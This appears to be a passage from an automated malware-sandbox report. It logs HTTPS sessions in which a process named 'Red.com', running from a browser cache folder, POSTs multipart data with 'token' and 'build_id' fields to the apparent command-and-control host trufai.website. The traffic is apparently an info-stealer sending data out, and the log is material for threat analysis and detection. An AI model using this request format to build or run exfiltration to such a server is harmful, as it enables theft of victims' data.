2025-01-03 13:30:53 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----rq9hd26p89zcjmohdtj5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 66001 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:53 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 72 71 39 68 64 32 36 70 38 39 7a 63 6a 6d 6f 68 64 74 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 72 71 39 68 64 32 36 70 38 39 7a 63 6a 6d 6f 68 64 74 6a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 72 71 39 68 64 32 36 70 38 39 7a 63 6a 6d 6f 68 64 74 6a 35 0d 0a 43 6f 6e 74 Data Ascii: ------rq9hd26p89zcjmohdtj5Content-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------rq9hd26p89zcjmohdtj5Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------rq9hd26p89zcjmohdtj5Cont
2025-01-03 13:30:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:53 UTC	581	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:54 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-03 13:30:54 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49778	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:55 UTC	282	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----8qqiwt0r1db1n7g4wbas User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 153381 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 38 71 71 69 77 74 30 72 31 64 62 31 6e 37 67 34 77 62 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 38 71 71 69 77 74 30 72 31 64 62 31 6e 37 67 34 77 62 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 38 71 71 69 77 74 30 72 31 64 62 31 6e 37 67 34 77 62 61 73 0d 0a 43 6f 6e 74 Data Ascii: ------8qqiwt0r1db1n7g4wbasContent-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------8qqiwt0r1db1n7g4wbasContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------8qqiwt0r1db1n7g4wbasCont
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:55 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:55 UTC	6186	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2025-01-03 13:30:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 03 Jan 2025 13:30:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49784	116.203.13.109	443	7592	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\91531\Red.com

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:30:56 UTC	282	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----o8g4ek6xlx4wbi5xlxl6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: trufai.website Content-Length: 393697 Connection: Keep-Alive Cache-Control: no-cache
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6f 38 67 34 65 6b 36 78 6c 78 34 77 62 69 35 78 6c 78 6c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 61 31 37 64 62 33 38 31 61 34 33 65 65 33 65 34 61 33 35 37 63 34 35 63 37 64 32 35 36 38 61 0d 0a 2d 2d 2d 2d 2d 2d 6f 38 67 34 65 6b 36 78 6c 78 34 77 62 69 35 78 6c 78 6c 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6f 38 67 34 65 6b 36 78 6c 78 34 77 62 69 35 78 6c 78 6c 36 0d 0a 43 6f 6e 74 Data Ascii: ------o8g4ek6xlx4wbi5xlxl6Content-Disposition: form-data; name="token"5a17db381a43ee3e4a357c45c7d2568a------o8g4ek6xlx4wbi5xlxl6Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------o8g4ek6xlx4wbi5xlxl6Cont
2025-01-03 13:30:56 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
